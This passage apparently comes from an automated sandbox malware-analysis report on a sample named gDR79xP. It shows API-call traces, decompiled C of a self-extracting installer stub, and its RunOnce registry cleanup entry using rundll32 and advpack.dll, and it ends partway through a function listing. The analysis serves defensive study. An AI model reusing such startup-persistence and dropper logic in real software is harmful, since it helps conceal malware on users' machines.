                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0010208C
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001020C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001020EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00102103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00102134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0010215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0010218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001021C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001021E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0010223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00102250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                                • API String ID: 178549006-2663108224
                                                                                                                                                                                                                                                • Opcode ID: 650f3b2644842ee5d1d21563c0529f0896056134cdc9548ce2ee756c290f4afd
                                                                                                                                                                                                                                                • Instruction ID: e412fd225f1e0794602d3b0466e2b935a7fb3b439a59ab829db9ebd18ec344c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 650f3b2644842ee5d1d21563c0529f0896056134cdc9548ce2ee756c290f4afd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0751C471A00218ABDB20AB64DC4DFEB777CEF54700F0041A4FAC5E61D5DBF59D898A60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001055A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 1055a0-1055d9 call 10468f LocalAlloc 235 1055db-1055f1 call 1044b9 call 106285 232->235 236 1055fd-10560c call 10468f 232->236 248 1055f6-1055f8 235->248 242 105632-105643 lstrcmpA 236->242 243 10560e-105630 call 1044b9 LocalFree 236->243 246 105645 242->246 247 10564b-105659 LocalFree 242->247 243->248 246->247 250 105696-10569c 247->250 251 10565b-10565d 247->251 252 1058b7-1058c7 call 106ce0 248->252 253 1056a2-1056a8 250->253 254 10589f-1058b5 call 106517 250->254 255 105669 251->255 256 10565f-105667 251->256 253->254 259 1056ae-1056c1 GetTempPathA 253->259 254->252 260 10566b-10567a call 105467 255->260 256->255 256->260 264 1056f3-105711 call 101781 259->264 265 1056c3-1056c9 call 105467 259->265 269 105680-105691 call 1044b9 260->269 270 10589b-10589d 260->270 274 105717-105729 GetDriveTypeA 264->274 275 10586c-105890 GetWindowsDirectoryA call 10597d 264->275 272 1056ce-1056d0 265->272 269->248 270->252 272->270 276 1056d6-1056df call 102630 272->276 278 105730-105740 GetFileAttributesA 274->278 279 10572b-10572e 274->279 275->264 289 105896 275->289 276->264 290 1056e1-1056ed call 105467 276->290 282 105742-105745 278->282 283 10577e-10578f call 10597d 278->283 279->278 279->282 287 105747-10574f 282->287 288 10576b 282->288 297 105791-10579e call 102630 283->297 298 1057b2-1057bf call 102630 283->298 292 105771-105779 287->292 293 105751-105753 287->293 288->292 289->270 290->264 290->270 295 105864-105866 292->295 293->292 299 105755-105762 call 106952 293->299 295->274 295->275 297->288 306 1057a0-1057b0 call 10597d 297->306 307 1057c1-1057cd GetWindowsDirectoryA 298->307 308 1057d3-1057f8 call 10658a GetFileAttributesA 298->308 299->288 309 105764-105769 299->309 306->288 306->298 307->308 314 10580a 308->314 315 1057fa-105808 CreateDirectoryA 308->315 309->283 309->288 316 10580d-10580f 314->316 315->316 317 105811-105825 316->317 318 105827-10585c SetFileAttributesA call 101781 call 105467 316->318 317->295 318->270 323 10585e 318->323 323->295
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E001055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t28 ^ _t110;
				_t2 = E0010468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0010468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x109a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x108b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x108a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00106517(_t82, 0x7d2, 0, E00103210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x109a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x1091e4;
									_t40 = GetTempPathA(0x104, 0x1091e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00101781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00106952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0010597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00102630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0010658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x1091e4;
																					E00101781(0x1091e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00105467(0x1091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00102630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0010597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00105467(0x1091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x1091e4;
											_t70 = E00102630(0, 0x1091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x1091e4;
												_t71 = E00105467(0x1091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0010597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x108b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00105467(0x108b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E001044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x109124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x109124 = E00106285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00106CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                                0x001055ab
                                                                                                                                                                                                                                                0x001055b2
                                                                                                                                                                                                                                                0x001055c9
                                                                                                                                                                                                                                                0x001055d5
                                                                                                                                                                                                                                                0x001055d9
                                                                                                                                                                                                                                                0x00105600
                                                                                                                                                                                                                                                0x00105605
                                                                                                                                                                                                                                                0x0010560a
                                                                                                                                                                                                                                                0x0010560c
                                                                                                                                                                                                                                                0x00105638
                                                                                                                                                                                                                                                0x00105641
                                                                                                                                                                                                                                                0x00105643
                                                                                                                                                                                                                                                0x00105645
                                                                                                                                                                                                                                                0x00105645
                                                                                                                                                                                                                                                0x0010564c
                                                                                                                                                                                                                                                0x00105652
                                                                                                                                                                                                                                                0x00105657
                                                                                                                                                                                                                                                0x00105659
                                                                                                                                                                                                                                                0x00105696
                                                                                                                                                                                                                                                0x0010569c
                                                                                                                                                                                                                                                0x0010589f
                                                                                                                                                                                                                                                0x001058a7
                                                                                                                                                                                                                                                0x001058ac
                                                                                                                                                                                                                                                0x001058b3
                                                                                                                                                                                                                                                0x001058b5
                                                                                                                                                                                                                                                0x001056a2
                                                                                                                                                                                                                                                0x001056a2
                                                                                                                                                                                                                                                0x001056a8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056ae
                                                                                                                                                                                                                                                0x001056ae
                                                                                                                                                                                                                                                0x001056b9
                                                                                                                                                                                                                                                0x001056bf
                                                                                                                                                                                                                                                0x001056c1
                                                                                                                                                                                                                                                0x001056f3
                                                                                                                                                                                                                                                0x001056f3
                                                                                                                                                                                                                                                0x00105705
                                                                                                                                                                                                                                                0x0010570a
                                                                                                                                                                                                                                                0x00105711
                                                                                                                                                                                                                                                0x00105717
                                                                                                                                                                                                                                                0x00105724
                                                                                                                                                                                                                                                0x00105726
                                                                                                                                                                                                                                                0x00105729
                                                                                                                                                                                                                                                0x00105730
                                                                                                                                                                                                                                                0x00105737
                                                                                                                                                                                                                                                0x0010573d
                                                                                                                                                                                                                                                0x00105740
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010572b
                                                                                                                                                                                                                                                0x0010572b
                                                                                                                                                                                                                                                0x0010572e
                                                                                                                                                                                                                                                0x00105742
                                                                                                                                                                                                                                                0x00105742
                                                                                                                                                                                                                                                0x00105745
                                                                                                                                                                                                                                                0x0010576b
                                                                                                                                                                                                                                                0x0010576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105747
                                                                                                                                                                                                                                                0x00105747
                                                                                                                                                                                                                                                0x0010574d
                                                                                                                                                                                                                                                0x0010574f
                                                                                                                                                                                                                                                0x00105771
                                                                                                                                                                                                                                                0x00105771
                                                                                                                                                                                                                                                0x00105773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105751
                                                                                                                                                                                                                                                0x00105751
                                                                                                                                                                                                                                                0x00105753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105755
                                                                                                                                                                                                                                                0x0010575b
                                                                                                                                                                                                                                                0x00105760
                                                                                                                                                                                                                                                0x00105762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105764
                                                                                                                                                                                                                                                0x00105764
                                                                                                                                                                                                                                                0x00105769
                                                                                                                                                                                                                                                0x0010577e
                                                                                                                                                                                                                                                0x0010577e
                                                                                                                                                                                                                                                0x00105781
                                                                                                                                                                                                                                                0x00105788
                                                                                                                                                                                                                                                0x0010578d
                                                                                                                                                                                                                                                0x0010578f
                                                                                                                                                                                                                                                0x001057b2
                                                                                                                                                                                                                                                0x001057b8
                                                                                                                                                                                                                                                0x001057bd
                                                                                                                                                                                                                                                0x001057bf
                                                                                                                                                                                                                                                0x001057cd
                                                                                                                                                                                                                                                0x001057cd
                                                                                                                                                                                                                                                0x001057dd
                                                                                                                                                                                                                                                0x001057e3
                                                                                                                                                                                                                                                0x001057ef
                                                                                                                                                                                                                                                0x001057f5
                                                                                                                                                                                                                                                0x001057f8
                                                                                                                                                                                                                                                0x0010580a
                                                                                                                                                                                                                                                0x0010580a
                                                                                                                                                                                                                                                0x001057fa
                                                                                                                                                                                                                                                0x00105802
                                                                                                                                                                                                                                                0x00105802
                                                                                                                                                                                                                                                0x0010580d
                                                                                                                                                                                                                                                0x0010580f
                                                                                                                                                                                                                                                0x00105830
                                                                                                                                                                                                                                                0x00105836
                                                                                                                                                                                                                                                0x0010583d
                                                                                                                                                                                                                                                0x0010584b
                                                                                                                                                                                                                                                0x00105851
                                                                                                                                                                                                                                                0x00105855
                                                                                                                                                                                                                                                0x0010585a
                                                                                                                                                                                                                                                0x0010585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010585e
                                                                                                                                                                                                                                                0x00105811
                                                                                                                                                                                                                                                0x00105817
                                                                                                                                                                                                                                                0x00105819
                                                                                                                                                                                                                                                0x0010581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010581f
                                                                                                                                                                                                                                                0x00105791
                                                                                                                                                                                                                                                0x00105797
                                                                                                                                                                                                                                                0x0010579c
                                                                                                                                                                                                                                                0x0010579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001057a0
                                                                                                                                                                                                                                                0x001057a9
                                                                                                                                                                                                                                                0x001057ae
                                                                                                                                                                                                                                                0x001057b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001057b0
                                                                                                                                                                                                                                                0x0010579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105769
                                                                                                                                                                                                                                                0x00105762
                                                                                                                                                                                                                                                0x00105753
                                                                                                                                                                                                                                                0x0010574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105864
                                                                                                                                                                                                                                                0x00105717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056c3
                                                                                                                                                                                                                                                0x001056c5
                                                                                                                                                                                                                                                0x001056c9
                                                                                                                                                                                                                                                0x001056ce
                                                                                                                                                                                                                                                0x001056d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056d6
                                                                                                                                                                                                                                                0x001056d6
                                                                                                                                                                                                                                                0x001056d8
                                                                                                                                                                                                                                                0x001056dd
                                                                                                                                                                                                                                                0x001056df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056e1
                                                                                                                                                                                                                                                0x001056e2
                                                                                                                                                                                                                                                0x001056e4
                                                                                                                                                                                                                                                0x001056e6
                                                                                                                                                                                                                                                0x001056eb
                                                                                                                                                                                                                                                0x001056ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001056f3
                                                                                                                                                                                                                                                0x001056f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010586c
                                                                                                                                                                                                                                                0x00105878
                                                                                                                                                                                                                                                0x0010587e
                                                                                                                                                                                                                                                0x00105882
                                                                                                                                                                                                                                                0x00105883
                                                                                                                                                                                                                                                0x00105889
                                                                                                                                                                                                                                                0x0010588e
                                                                                                                                                                                                                                                0x0010588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105896
                                                                                                                                                                                                                                                0x001056ed
                                                                                                                                                                                                                                                0x001056df
                                                                                                                                                                                                                                                0x001056d0
                                                                                                                                                                                                                                                0x001056c1
                                                                                                                                                                                                                                                0x001056a8
                                                                                                                                                                                                                                                0x0010565b
                                                                                                                                                                                                                                                0x0010565b
                                                                                                                                                                                                                                                0x0010565d
                                                                                                                                                                                                                                                0x00105669
                                                                                                                                                                                                                                                0x00105669
                                                                                                                                                                                                                                                0x0010565f
                                                                                                                                                                                                                                                0x0010565f
                                                                                                                                                                                                                                                0x00105665
                                                                                                                                                                                                                                                0x00105667
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105667
                                                                                                                                                                                                                                                0x0010566c
                                                                                                                                                                                                                                                0x00105673
                                                                                                                                                                                                                                                0x00105678
                                                                                                                                                                                                                                                0x0010567a
                                                                                                                                                                                                                                                0x0010589b
                                                                                                                                                                                                                                                0x0010589b
                                                                                                                                                                                                                                                0x00105680
                                                                                                                                                                                                                                                0x00105685
                                                                                                                                                                                                                                                0x0010568c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010568c
                                                                                                                                                                                                                                                0x0010567a
                                                                                                                                                                                                                                                0x0010560e
                                                                                                                                                                                                                                                0x00105613
                                                                                                                                                                                                                                                0x0010561a
                                                                                                                                                                                                                                                0x00105620
                                                                                                                                                                                                                                                0x00105626
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105626
                                                                                                                                                                                                                                                0x001055db
                                                                                                                                                                                                                                                0x001055e0
                                                                                                                                                                                                                                                0x001055e7
                                                                                                                                                                                                                                                0x001055f1
                                                                                                                                                                                                                                                0x001055f6
                                                                                                                                                                                                                                                0x001055f6
                                                                                                                                                                                                                                                0x001055f6
                                                                                                                                                                                                                                                0x001058b7
                                                                                                                                                                                                                                                0x001058c7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001055CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00105638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0010564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00105620
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001056B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0010571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00105737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001057CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001057EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00105802
                                                                                                                                                                                                                                                  • Part of subcall function 00102630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00102654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00105830
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
                                                                                                                                                                                                                                                  • Part of subcall function 00106517: FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00105878
                                                                                                                                                                                                                                                  • Part of subcall function 0010597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001059A8
                                                                                                                                                                                                                                                  • Part of subcall function 0010597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001059AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-3708386018
                                                                                                                                                                                                                                                • Opcode ID: 1b6684f319638012dbf474f8bd8beece69b17072e4131e221a1993ff31758d15
                                                                                                                                                                                                                                                • Instruction ID: 02a1ad5bed5cb68c6da3958314e7c9eb004d37c026fce83f3391524fc7f90303
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b6684f319638012dbf474f8bd8beece69b17072e4131e221a1993ff31758d15
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26812BB0A04A089BDB24AB359C95BEF766F9F64300F844066F9C6D21D1EFF48DC18E61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0010597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
